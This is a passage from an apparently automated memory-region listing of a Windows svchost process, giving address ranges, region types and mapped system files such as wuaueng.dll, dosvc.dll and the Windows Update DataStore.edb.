1139 start_va = 0xb4343b0000 end_va = 0xb4344affff entry_point = 0x0 region_type = private name = "private_0x000000b4343b0000" filename = "" Region: id = 1140 start_va = 0xb4344b0000 end_va = 0xb4344bffff entry_point = 0xb4344b0000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1141 start_va = 0xb4344c0000 end_va = 0xb4344cffff entry_point = 0xb4344c0000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1142 start_va = 0xb4344d0000 end_va = 0xb4344dffff entry_point = 0xb4344d0000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1143 start_va = 0xb4344f0000 end_va = 0xb4344fffff entry_point = 0xb4344f0000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1144 start_va = 0xb434500000 end_va = 0xb43450ffff entry_point = 0xb434500000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1145 start_va = 0xb434510000 end_va = 0xb43451ffff entry_point = 0xb434510000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1146 start_va = 0xb434520000 end_va = 0xb43452ffff entry_point = 0xb434520000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1147 start_va = 0xb434530000 end_va = 0xb43453ffff entry_point = 0xb434530000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1148 start_va = 0xb434540000 end_va = 0xb43454ffff entry_point = 0xb434540000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1149 start_va = 0xb434550000 end_va = 0xb43455ffff entry_point = 0x0 region_type = private name = "private_0x000000b434550000" filename = "" Region: id = 1150 start_va = 0xb434560000 end_va = 0xb43456ffff entry_point = 0x0 region_type = private name = "private_0x000000b434560000" filename = "" Region: id = 1151 start_va = 0xb434570000 end_va = 0xb43457ffff entry_point = 0x0 region_type = private name = "private_0x000000b434570000" filename = "" Region: id = 1152 start_va = 0xb434580000 end_va = 0xb43458ffff entry_point = 0x0 region_type = private name = "private_0x000000b434580000" filename = "" Region: id = 1153 start_va = 0xb434590000 end_va = 0xb43459ffff entry_point = 0x0 region_type = private name = "private_0x000000b434590000" filename = "" Region: id = 1154 start_va = 0xb4345a0000 end_va = 0xb4345a6fff entry_point = 0x0 region_type = private name = "private_0x000000b4345a0000" filename = "" Region: id = 1155 start_va = 0xb4345b0000 end_va = 0xb4345b7fff entry_point = 0x0 region_type = private name = "private_0x000000b4345b0000" filename = "" Region: id = 1156 start_va = 0xb4345c0000 end_va = 0xb4345cffff entry_point = 0x0 region_type = private name = "private_0x000000b4345c0000" filename = "" Region: id = 1157 start_va = 0xb4345d0000 end_va = 0xb4345d0fff entry_point = 0xb4345d0000 region_type = mapped_file name = "msxml6r.dll" filename = "\\Windows\\System32\\msxml6r.dll" (normalized: "c:\\windows\\system32\\msxml6r.dll") Region: id = 1158 start_va = 0xb4345e0000 end_va = 0xb4345e3fff entry_point = 0xb4345e0000 region_type = mapped_file name = "wuaueng.dll.mui" filename = "\\Windows\\System32\\en-US\\wuaueng.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\wuaueng.dll.mui") Region: id = 1159 start_va = 0xb4345f0000 end_va = 0xb4345fffff entry_point = 0xb4345f0000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1160 start_va = 0xb434600000 end_va = 0xb4346fffff entry_point = 0x0 region_type = private name = "private_0x000000b434600000" filename = "" Region: id = 1161 start_va = 0xb434700000 end_va = 0xb4347fffff entry_point = 0x0 region_type = private name = "private_0x000000b434700000" filename = "" Region: id = 1162 start_va = 0xb434800000 end_va = 0xb4348fffff entry_point = 0x0 region_type = private name = "private_0x000000b434800000" filename = "" Region: id = 1163 start_va = 0xb434900000 end_va = 0xb4349fffff entry_point = 0x0 region_type = private name = "private_0x000000b434900000" filename = "" Region: id = 1164 start_va = 0xb434a00000 end_va = 0xb434afffff entry_point = 0x0 region_type = private name = "private_0x000000b434a00000" filename = "" Region: id = 1165 start_va = 0xb434b00000 end_va = 0xb434bfffff entry_point = 0x0 region_type = private name = "private_0x000000b434b00000" filename = "" Region: id = 1166 start_va = 0xb434c00000 end_va = 0xb435bfffff entry_point = 0x0 region_type = private name = "private_0x000000b434c00000" filename = "" Region: id = 1167 start_va = 0xb435c00000 end_va = 0xb439bfffff entry_point = 0x0 region_type = private name = "private_0x000000b435c00000" filename = "" Region: id = 1168 start_va = 0xb439c00000 end_va = 0xb43dbfffff entry_point = 0x0 region_type = private name = "private_0x000000b439c00000" filename = "" Region: id = 1169 start_va = 0xb43dc00000 end_va = 0xb43dc7ffff entry_point = 0x0 region_type = private name = "private_0x000000b43dc00000" filename = "" Region: id = 1170 start_va = 0xb43dc80000 end_va = 0xb43dd7ffff entry_point = 0x0 region_type = private name = "private_0x000000b43dc80000" filename = "" Region: id = 1171 start_va = 0xb43dd80000 end_va = 0xb43dd8ffff entry_point = 0xb43dd80000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1172 start_va = 0xb43dd90000 end_va = 0xb43dd9ffff entry_point = 0xb43dd90000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1173 start_va = 0xb43dda0000 end_va = 0xb43ddaffff entry_point = 0xb43dda0000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1174 start_va = 0xb43ddb0000 end_va = 0xb43ddbffff entry_point = 0xb43ddb0000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1175 start_va = 0xb43ddc0000 end_va = 0xb43ddcffff entry_point = 0xb43ddc0000 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1176 start_va = 0xb43de00000 end_va = 0xb43de06fff entry_point = 0x0 region_type = private name = "private_0x000000b43de00000" filename = "" Region: id = 1177 start_va = 0xb43de10000 end_va = 0xb43de8ffff entry_point = 0x0 region_type = private name = "private_0x000000b43de10000" filename = "" Region: id = 1178 start_va = 0xb43df00000 end_va = 0xb43dffffff entry_point = 0x0 region_type = private name = "private_0x000000b43df00000" filename = "" Region: id = 1179 start_va = 0xb43e000000 end_va = 0xb43e0fffff entry_point = 0x0 region_type = private name = "private_0x000000b43e000000" filename = "" Region: id = 1180 start_va = 0xb43e100000 end_va = 0xb43e1fffff entry_point = 0x0 region_type = private name = "private_0x000000b43e100000" filename = "" Region: id = 1181 start_va = 0xb43e200000 end_va = 0xb43e2fffff entry_point = 0x0 region_type = private name = "private_0x000000b43e200000" filename = "" Region: id = 1182 start_va = 0xb43e300000 end_va = 0xb43e3fffff entry_point = 0x0 region_type = private name = "private_0x000000b43e300000" filename = "" Region: id = 1183 start_va = 0xb43e400000 end_va = 0xb43e4fffff entry_point = 0x0 region_type = private name = "private_0x000000b43e400000" filename = "" Region: id = 1184 start_va = 0xb43e500000 end_va = 0xb43e5fffff entry_point = 0x0 region_type = private name = "private_0x000000b43e500000" filename = "" Region: id = 1185 start_va = 0xb43e600000 end_va = 0xb43e6fffff entry_point = 0x0 region_type = private name = "private_0x000000b43e600000" filename = "" Region: id = 1186 start_va = 0xb43e700000 end_va = 0xb43e7fffff entry_point = 0x0 region_type = private name = "private_0x000000b43e700000" filename = "" Region: id = 1187 start_va = 0xb43e800000 end_va = 0xb43e8fffff entry_point = 0x0 region_type = private name = "private_0x000000b43e800000" filename = "" Region: id = 1188 start_va = 0xb43e900000 end_va = 0xb43e9fffff entry_point = 0x0 region_type = private name = "private_0x000000b43e900000" filename = "" Region: id = 1189 start_va = 0xb43ea00000 end_va = 0xb43eafffff entry_point = 0x0 region_type = private name = "private_0x000000b43ea00000" filename = "" Region: id = 1190 start_va = 0xb43eb00000 end_va = 0xb43ebfffff entry_point = 0x0 region_type = private name = "private_0x000000b43eb00000" filename = "" Region: id = 1191 start_va = 0xb43ec00000 end_va = 0xb43ecfffff entry_point = 0x0 region_type = private name = "private_0x000000b43ec00000" filename = "" Region: id = 1192 start_va = 0xb43ed00000 end_va = 0xb43edfffff entry_point = 0x0 region_type = private name = "private_0x000000b43ed00000" filename = "" Region: id = 1193 start_va = 0xb43ee00000 end_va = 0xb43eefffff entry_point = 0x0 region_type = private name = "private_0x000000b43ee00000" filename = "" Region: id = 1194 start_va = 0xb43ef00000 end_va = 0xb43effffff entry_point = 0x0 region_type = private name = "private_0x000000b43ef00000" filename = "" Region: id = 1195 start_va = 0xb43f000000 end_va = 0xb43f0fffff entry_point = 0x0 region_type = private name = "private_0x000000b43f000000" filename = "" Region: id = 1196 start_va = 0xb43f100000 end_va = 0xb43f1fffff entry_point = 0x0 region_type = private name = "private_0x000000b43f100000" filename = "" Region: id = 1197 start_va = 0xb43f200000 end_va = 0xb43f2fffff entry_point = 0x0 region_type = private name = "private_0x000000b43f200000" filename = "" Region: id = 1198 start_va = 0xb43f300000 end_va = 0xb43f3fffff entry_point = 0x0 region_type = private name = "private_0x000000b43f300000" filename = "" Region: id = 1199 start_va = 0xb43f400000 end_va = 0xb43f4fffff entry_point = 0x0 region_type = private name = "private_0x000000b43f400000" filename = "" Region: id = 1200 start_va = 0xb43f500000 end_va = 0xb43f5fffff entry_point = 0x0 region_type = private name = "private_0x000000b43f500000" filename = "" Region: id = 1201 start_va = 0xb43f600000 end_va = 0xb43f6fffff entry_point = 0x0 region_type = private name = "private_0x000000b43f600000" filename = "" Region: id = 1202 start_va = 0xb43f700000 end_va = 0xb43f7fffff entry_point = 0x0 region_type = private name = "private_0x000000b43f700000" filename = "" Region: id = 1203 start_va = 0xb43f800000 end_va = 0xb43f8fffff entry_point = 0x0 region_type = private name = "private_0x000000b43f800000" filename = "" Region: id = 1204 start_va = 0xb43f900000 end_va = 0xb43f9fffff entry_point = 0x0 region_type = private name = "private_0x000000b43f900000" filename = "" Region: id = 1205 start_va = 0xb43fa00000 end_va = 0xb43fafffff entry_point = 0x0 region_type = private name = "private_0x000000b43fa00000" filename = "" Region: id = 1206 start_va = 0xb43fb00000 end_va = 0xb43fbfffff entry_point = 0x0 region_type = private name = "private_0x000000b43fb00000" filename = "" Region: id = 1207 start_va = 0xb43fc00000 end_va = 0xb43fcfffff entry_point = 0x0 region_type = private name = "private_0x000000b43fc00000" filename = "" Region: id = 1208 start_va = 0xb43fd00000 end_va = 0xb43fdfffff entry_point = 0x0 region_type = private name = "private_0x000000b43fd00000" filename = "" Region: id = 1209 start_va = 0x7df5fff20000 end_va = 0x7ff5fff1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5fff20000" filename = "" Region: id = 1210 start_va = 0x7ff6e00aa000 end_va = 0x7ff6e00abfff entry_point = 0x0 region_type = private name = "private_0x00007ff6e00aa000" filename = "" Region: id = 1211 start_va = 0x7ff6e00ac000 end_va = 0x7ff6e00adfff entry_point = 0x0 region_type = private name = "private_0x00007ff6e00ac000" filename = "" Region: id = 1212 start_va = 0x7ff6e00ae000 end_va = 0x7ff6e00affff entry_point = 0x0 region_type = private name = "private_0x00007ff6e00ae000" filename = "" Region: id = 1213 start_va = 0x7ff6e00b0000 end_va = 0x7ff6e00b1fff entry_point = 0x0 region_type = private name = "private_0x00007ff6e00b0000" filename = "" Region: id = 1214 start_va = 0x7ff6e00b2000 end_va = 0x7ff6e00b3fff entry_point = 0x0 region_type = private name = "private_0x00007ff6e00b2000" filename = "" Region: id = 1215 start_va = 0x7ff6e00b4000 end_va = 0x7ff6e00b5fff entry_point = 0x0 region_type = private name = "private_0x00007ff6e00b4000" filename = "" Region: id = 1216 start_va = 0x7ff6e00b6000 end_va = 0x7ff6e00b7fff entry_point = 0x0 region_type = private name = "private_0x00007ff6e00b6000" filename = "" Region: id = 1217 start_va = 0x7ff6e00b8000 end_va = 0x7ff6e00b9fff entry_point = 0x0 region_type = private name = "private_0x00007ff6e00b8000" filename = "" Region: id = 1218 start_va = 0x7ff6e00ba000 end_va = 0x7ff6e00bbfff entry_point = 0x0 region_type = private name = "private_0x00007ff6e00ba000" filename = "" Region: id = 1219 start_va = 0x7ff6e00bc000 end_va = 0x7ff6e00bdfff entry_point = 0x0 region_type = private name = "private_0x00007ff6e00bc000" filename = "" Region: id = 1220 start_va = 0x7ff6e00be000 end_va = 0x7ff6e00bffff entry_point = 0x0 region_type = private name = "private_0x00007ff6e00be000" filename = "" Region: id = 1221 start_va = 0x7ff6e00c0000 end_va = 0x7ff6e00c1fff entry_point = 0x0 region_type = private name = "private_0x00007ff6e00c0000" filename = "" Region: id = 1222 start_va = 0x7ff6e00c2000 end_va = 0x7ff6e00c3fff entry_point = 0x0 region_type = private name = "private_0x00007ff6e00c2000" filename = "" Region: id = 1223 start_va = 0x7ff6e00c4000 end_va = 0x7ff6e00c5fff entry_point = 0x0 region_type = private name = "private_0x00007ff6e00c4000" filename = "" Region: id = 1224 start_va = 0x7ff6e00c6000 end_va = 0x7ff6e00c7fff entry_point = 0x0 region_type = private name = "private_0x00007ff6e00c6000" filename = "" Region: id = 1225 start_va = 0x7ff6e00c8000 end_va = 0x7ff6e00c9fff entry_point = 0x0 region_type = private name = "private_0x00007ff6e00c8000" filename = "" Region: id = 1226 start_va = 0x7ff6e00ca000 end_va = 0x7ff6e00cbfff entry_point = 0x0 region_type = private name = "private_0x00007ff6e00ca000" filename = "" Region: id = 1227 start_va = 0x7ff6e00cc000 end_va = 0x7ff6e00cdfff entry_point = 0x0 region_type = private name = "private_0x00007ff6e00cc000" filename = "" Region: id = 1228 start_va = 0x7ff6e00ce000 end_va = 0x7ff6e00cffff entry_point = 0x0 region_type = private name = "private_0x00007ff6e00ce000" filename = "" Region: id = 1229 start_va = 0x7ff6e00d0000 end_va = 0x7ff6e00d1fff entry_point = 0x0 region_type = private name = "private_0x00007ff6e00d0000" filename = "" Region: id = 1230 start_va = 0x7ff6e00d2000 end_va = 0x7ff6e00d3fff entry_point = 0x0 region_type = private name = "private_0x00007ff6e00d2000" filename = "" Region: id = 1231 start_va = 0x7ff6e00d4000 end_va = 0x7ff6e00d5fff entry_point = 0x0 region_type = private name = "private_0x00007ff6e00d4000" filename = "" Region: id = 1232 start_va = 0x7ff6e00d6000 end_va = 0x7ff6e00d7fff entry_point = 0x0 region_type = private name = "private_0x00007ff6e00d6000" filename = "" Region: id = 1233 start_va = 0x7ff6e00d8000 end_va = 0x7ff6e00d9fff entry_point = 0x0 region_type = private name = "private_0x00007ff6e00d8000" filename = "" Region: id = 1234 start_va = 0x7ff6e00da000 end_va = 0x7ff6e00dbfff entry_point = 0x0 region_type = private name = "private_0x00007ff6e00da000" filename = "" Region: id = 1235 start_va = 0x7ff6e00dc000 end_va = 0x7ff6e00ddfff entry_point = 0x0 region_type = private name = "private_0x00007ff6e00dc000" filename = "" Region: id = 1236 start_va = 0x7ff6e00de000 end_va = 0x7ff6e00dffff entry_point = 0x0 region_type = private name = "private_0x00007ff6e00de000" filename = "" Region: id = 1237 start_va = 0x7ff6e00e0000 end_va = 0x7ff6e00e1fff entry_point = 0x0 region_type = private name = "private_0x00007ff6e00e0000" filename = "" Region: id = 1238 start_va = 0x7ff6e00e2000 end_va = 0x7ff6e00e3fff entry_point = 0x0 region_type = private name = "private_0x00007ff6e00e2000" filename = "" Region: id = 1239 start_va = 0x7ff6e00e4000 end_va = 0x7ff6e00e5fff entry_point = 0x0 region_type = private name = "private_0x00007ff6e00e4000" filename = "" Region: id = 1240 start_va = 0x7ff6e00e6000 end_va = 0x7ff6e00e7fff entry_point = 0x0 region_type = private name = "private_0x00007ff6e00e6000" filename = "" Region: id = 1241 start_va = 0x7ff6e00e8000 end_va = 0x7ff6e00e9fff entry_point = 0x0 region_type = private name = "private_0x00007ff6e00e8000" filename = "" Region: id = 1242 start_va = 0x7ff6e00ea000 end_va = 0x7ff6e00ebfff entry_point = 0x0 region_type = private name = "private_0x00007ff6e00ea000" filename = "" Region: id = 1243 start_va = 0x7ff6e00ec000 end_va = 0x7ff6e00edfff entry_point = 0x0 region_type = private name = "private_0x00007ff6e00ec000" filename = "" Region: id = 1244 start_va = 0x7ff6e00ee000 end_va = 0x7ff6e00effff entry_point = 0x0 region_type = private name = "private_0x00007ff6e00ee000" filename = "" Region: id = 1245 start_va = 0x7ff6e00f0000 end_va = 0x7ff6e00f1fff entry_point = 0x0 region_type = private name = "private_0x00007ff6e00f0000" filename = "" Region: id = 1246 start_va = 0x7ff6e00f2000 end_va = 0x7ff6e00f3fff entry_point = 0x0 region_type = private name = "private_0x00007ff6e00f2000" filename = "" Region: id = 1247 start_va = 0x7ff6e00f4000 end_va = 0x7ff6e00f5fff entry_point = 0x0 region_type = private name = "private_0x00007ff6e00f4000" filename = "" Region: id = 1248 start_va = 0x7ff6e00f6000 end_va = 0x7ff6e00f7fff entry_point = 0x0 region_type = private name = "private_0x00007ff6e00f6000" filename = "" Region: id = 1249 start_va = 0x7ff6e00f8000 end_va = 0x7ff6e00f9fff entry_point = 0x0 region_type = private name = "private_0x00007ff6e00f8000" filename = "" Region: id = 1250 start_va = 0x7ff6e00fa000 end_va = 0x7ff6e00fbfff entry_point = 0x0 region_type = private name = "private_0x00007ff6e00fa000" filename = "" Region: id = 1251 start_va = 0x7ff6e00fc000 end_va = 0x7ff6e00fdfff entry_point = 0x0 region_type = private name = "private_0x00007ff6e00fc000" filename = "" Region: id = 1252 start_va = 0x7ff6e00fe000 end_va = 0x7ff6e00fffff entry_point = 0x0 region_type = private name = "private_0x00007ff6e00fe000" filename = "" Region: id = 1253 start_va = 0x7ff6e0100000 end_va = 0x7ff6e0101fff entry_point = 0x0 region_type = private name = "private_0x00007ff6e0100000" filename = "" Region: id = 1254 start_va = 0x7ff6e0102000 end_va = 0x7ff6e0103fff entry_point = 0x0 region_type = private name = "private_0x00007ff6e0102000" filename = "" Region: id = 1255 start_va = 0x7ff6e0104000 end_va = 0x7ff6e0105fff entry_point = 0x0 region_type = private name = "private_0x00007ff6e0104000" filename = "" Region: id = 1256 start_va = 0x7ff6e0106000 end_va = 0x7ff6e0107fff entry_point = 0x0 region_type = private name = "private_0x00007ff6e0106000" filename = "" Region: id = 1257 start_va = 0x7ff6e0108000 end_va = 0x7ff6e0109fff entry_point = 0x0 region_type = private name = "private_0x00007ff6e0108000" filename = "" Region: id = 1258 start_va = 0x7ff6e010a000 end_va = 0x7ff6e010bfff entry_point = 0x0 region_type = private name = "private_0x00007ff6e010a000" filename = "" Region: id = 1259 start_va = 0x7ff6e010c000 end_va = 0x7ff6e010dfff entry_point = 0x0 region_type = private name = "private_0x00007ff6e010c000" filename = "" Region: id = 1260 start_va = 0x7ff6e010e000 end_va = 0x7ff6e010ffff entry_point = 0x0 region_type = private name = "private_0x00007ff6e010e000" filename = "" Region: id = 1261 start_va = 0x7ff6e0110000 end_va = 0x7ff6e0111fff entry_point = 0x0 region_type = private name = "private_0x00007ff6e0110000" filename = "" Region: id = 1262 start_va = 0x7ff6e0112000 end_va = 0x7ff6e0113fff entry_point = 0x0 region_type = private name = "private_0x00007ff6e0112000" filename = "" Region: id = 1263 start_va = 0x7ff6e0114000 end_va = 0x7ff6e0115fff entry_point = 0x0 region_type = private name = "private_0x00007ff6e0114000" filename = "" Region: id = 1264 start_va = 0x7ff6e0116000 end_va = 0x7ff6e0117fff entry_point = 0x0 region_type = private name = "private_0x00007ff6e0116000" filename = "" Region: id = 1265 start_va = 0x7ff6e0118000 end_va = 0x7ff6e0119fff entry_point = 0x0 region_type = private name = "private_0x00007ff6e0118000" filename = "" Region: id = 1266 start_va = 0x7ff6e011a000 end_va = 0x7ff6e011bfff entry_point = 0x0 region_type = private name = "private_0x00007ff6e011a000" filename = "" Region: id = 1267 start_va = 0x7ff6e011c000 end_va = 0x7ff6e011dfff entry_point = 0x0 region_type = private name = "private_0x00007ff6e011c000" filename = "" Region: id = 1268 start_va = 0x7ff6e011e000 end_va = 0x7ff6e011ffff entry_point = 0x0 region_type = private name = "private_0x00007ff6e011e000" filename = "" Region: id = 1269 start_va = 0x7ff6e0120000 end_va = 0x7ff6e0121fff entry_point = 0x0 region_type = private name = "private_0x00007ff6e0120000" filename = "" Region: id = 1270 start_va = 0x7ff6e0122000 end_va = 0x7ff6e0123fff entry_point = 0x0 region_type = private name = "private_0x00007ff6e0122000" filename = "" Region: id = 1271 start_va = 0x7ff6e0124000 end_va = 0x7ff6e0125fff entry_point = 0x0 region_type = private name = "private_0x00007ff6e0124000" filename = "" Region: id = 1272 start_va = 0x7ff6e0126000 end_va = 0x7ff6e0127fff entry_point = 0x0 region_type = private name = "private_0x00007ff6e0126000" filename = "" Region: id = 1273 start_va = 0x7ff6e0128000 end_va = 0x7ff6e0129fff entry_point = 0x0 region_type = private name = "private_0x00007ff6e0128000" filename = "" Region: id = 1274 start_va = 0x7ff6e012a000 end_va = 0x7ff6e012bfff entry_point = 0x0 region_type = private name = "private_0x00007ff6e012a000" filename = "" Region: id = 1275 start_va = 0x7ff6e012e000 end_va = 0x7ff6e012ffff entry_point = 0x0 region_type = private name = "private_0x00007ff6e012e000" filename = "" Region: id = 1276 start_va = 0x7ff6e0130000 end_va = 0x7ff6e0131fff entry_point = 0x0 region_type = private name = "private_0x00007ff6e0130000" filename = "" Region: id = 1277 start_va = 0x7ff6e0132000 end_va = 0x7ff6e0133fff entry_point = 0x0 region_type = private name = "private_0x00007ff6e0132000" filename = "" Region: id = 1278 start_va = 0x7ff6e0134000 end_va = 0x7ff6e0135fff entry_point = 0x0 region_type = private name = "private_0x00007ff6e0134000" filename = "" Region: id = 1279 start_va = 0x7ff6e0138000 end_va = 0x7ff6e0139fff entry_point = 0x0 region_type = private name = "private_0x00007ff6e0138000" filename = "" Region: id = 1280 start_va = 0x7ff6e013a000 end_va = 0x7ff6e013bfff entry_point = 0x0 region_type = private name = "private_0x00007ff6e013a000" filename = "" Region: id = 1281 start_va = 0x7ff6e013c000 end_va = 0x7ff6e013dfff entry_point = 0x0 region_type = private name = "private_0x00007ff6e013c000" filename = "" Region: id = 1282 start_va = 0x7ff6e013e000 end_va = 0x7ff6e013ffff entry_point = 0x0 region_type = private name = "private_0x00007ff6e013e000" filename = "" Region: id = 1283 start_va = 0x7ff6e0140000 end_va = 0x7ff6e0141fff entry_point = 0x0 region_type = private name = "private_0x00007ff6e0140000" filename = "" Region: id = 1284 start_va = 0x7ff6e0142000 end_va = 0x7ff6e0143fff entry_point = 0x0 region_type = private name = "private_0x00007ff6e0142000" filename = "" Region: id = 1285 start_va = 0x7ff6e0144000 end_va = 0x7ff6e0145fff entry_point = 0x0 region_type = private name = "private_0x00007ff6e0144000" filename = "" Region: id = 1286 start_va = 0x7ff6e0146000 end_va = 0x7ff6e0147fff entry_point = 0x0 region_type = private name = "private_0x00007ff6e0146000" filename = "" Region: id = 1287 start_va = 0x7ff6e0148000 end_va = 0x7ff6e0149fff entry_point = 0x0 region_type = private name = "private_0x00007ff6e0148000" filename = "" Region: id = 1288 start_va = 0x7ff6e014a000 end_va = 0x7ff6e014bfff entry_point = 0x0 region_type = private name = "private_0x00007ff6e014a000" filename = "" Region: id = 1289 start_va = 0x7ff6e014c000 end_va = 0x7ff6e014dfff entry_point = 0x0 region_type = private name = "private_0x00007ff6e014c000" filename = "" Region: id = 1290 start_va = 0x7ff6e014e000 end_va = 0x7ff6e014ffff entry_point = 0x0 region_type = private name = "private_0x00007ff6e014e000" filename = "" Region: id = 1291 start_va = 0x7ff6e0150000 end_va = 0x7ff6e0151fff entry_point = 0x0 region_type = private name = "private_0x00007ff6e0150000" filename = "" Region: id = 1292 start_va = 0x7ff6e0152000 end_va = 0x7ff6e0153fff entry_point = 0x0 region_type = private name = "private_0x00007ff6e0152000" filename = "" Region: id = 1293 start_va = 0x7ff6e0154000 end_va = 0x7ff6e0155fff entry_point = 0x0 region_type = private name = "private_0x00007ff6e0154000" filename = "" Region: id = 1294 start_va = 0x7ff6e0156000 end_va = 0x7ff6e0157fff entry_point = 0x0 region_type = private name = "private_0x00007ff6e0156000" filename = "" Region: id = 1295 start_va = 0x7ff6e0158000 end_va = 0x7ff6e0159fff entry_point = 0x0 region_type = private name = "private_0x00007ff6e0158000" filename = "" Region: id = 1296 start_va = 0x7ff6e015a000 end_va = 0x7ff6e015bfff entry_point = 0x0 region_type = private name = "private_0x00007ff6e015a000" filename = "" Region: id = 1297 start_va = 0x7ff6e015c000 end_va = 0x7ff6e015dfff entry_point = 0x0 region_type = private name = "private_0x00007ff6e015c000" filename = "" Region: id = 1298 start_va = 0x7ff6e015e000 end_va = 0x7ff6e015ffff entry_point = 0x0 region_type = private name = "private_0x00007ff6e015e000" filename = "" Region: id = 1299 start_va = 0x7ff6e0160000 end_va = 0x7ff6e025ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6e0160000" filename = "" Region: id = 1300 start_va = 0x7ff6e0260000 end_va = 0x7ff6e0282fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6e0260000" filename = "" Region: id = 1301 start_va = 0x7ff6e0283000 end_va = 0x7ff6e0284fff entry_point = 0x0 region_type = private name = "private_0x00007ff6e0283000" filename = "" Region: id = 1302 start_va = 0x7ff6e0285000 end_va = 0x7ff6e0286fff entry_point = 0x0 region_type = private name = "private_0x00007ff6e0285000" filename = "" Region: id = 1303 start_va = 0x7ff6e0287000 end_va = 0x7ff6e0288fff entry_point = 0x0 region_type = private name = "private_0x00007ff6e0287000" filename = "" Region: id = 1304 start_va = 0x7ff6e0289000 end_va = 0x7ff6e028afff entry_point = 0x0 region_type = private name = "private_0x00007ff6e0289000" filename = "" Region: id = 1305 start_va = 0x7ff6e028b000 end_va = 0x7ff6e028cfff entry_point = 0x0 region_type = private name = "private_0x00007ff6e028b000" filename = "" Region: id = 1306 start_va = 0x7ff6e028d000 end_va = 0x7ff6e028efff entry_point = 0x0 region_type = private name = "private_0x00007ff6e028d000" filename = "" Region: id = 1307 start_va = 0x7ff6e028f000 end_va = 0x7ff6e028ffff entry_point = 0x0 region_type = private name = "private_0x00007ff6e028f000" filename = "" Region: id = 1308 start_va = 0x7ff6e1100000 end_va = 0x7ff6e110cfff entry_point = 0x7ff6e1100000 region_type = mapped_file name = "svchost.exe" filename = "\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe") Region: id = 1309 start_va = 0x7ffc3e7c0000 end_va = 0x7ffc3ea6ffff entry_point = 0x7ffc3e7c0000 region_type = mapped_file name = "netshell.dll" filename = "\\Windows\\System32\\netshell.dll" (normalized: "c:\\windows\\system32\\netshell.dll") Region: id = 1310 start_va = 0x7ffc3ff50000 end_va = 0x7ffc40071fff entry_point = 0x7ffc3ff50000 region_type = mapped_file name = "dosvc.dll" filename = "\\Windows\\System32\\dosvc.dll" (normalized: "c:\\windows\\system32\\dosvc.dll") Region: id = 1311 start_va = 0x7ffc401a0000 end_va = 0x7ffc403c9fff entry_point = 0x7ffc401a0000 region_type = mapped_file name = "wuaueng.dll" filename = "\\Windows\\System32\\wuaueng.dll" (normalized: "c:\\windows\\system32\\wuaueng.dll") Region: id = 1312 start_va = 0x7ffc41e90000 end_va = 0x7ffc41f13fff entry_point = 0x7ffc41e90000 region_type = mapped_file name = "winspool.drv" filename = "\\Windows\\System32\\winspool.drv" (normalized: "c:\\windows\\system32\\winspool.drv") Region: id = 1313 start_va = 0x7ffc423b0000 end_va = 0x7ffc423d7fff entry_point = 0x7ffc423b0000 region_type = mapped_file name = "dssenh.dll" filename = "\\Windows\\System32\\dssenh.dll" (normalized: "c:\\windows\\system32\\dssenh.dll") Region: id = 1314 start_va = 0x7ffc44450000 end_va = 0x7ffc446c6fff entry_point = 0x7ffc44450000 region_type = mapped_file name = "msxml6.dll" filename = "\\Windows\\System32\\msxml6.dll" (normalized: "c:\\windows\\system32\\msxml6.dll") Region: id = 1315 start_va = 0x7ffc44ce0000 end_va = 0x7ffc44d2cfff entry_point = 0x7ffc44ce0000 region_type = mapped_file name = "pdh.dll" filename = "\\Windows\\System32\\pdh.dll" (normalized: "c:\\windows\\system32\\pdh.dll") Region: id = 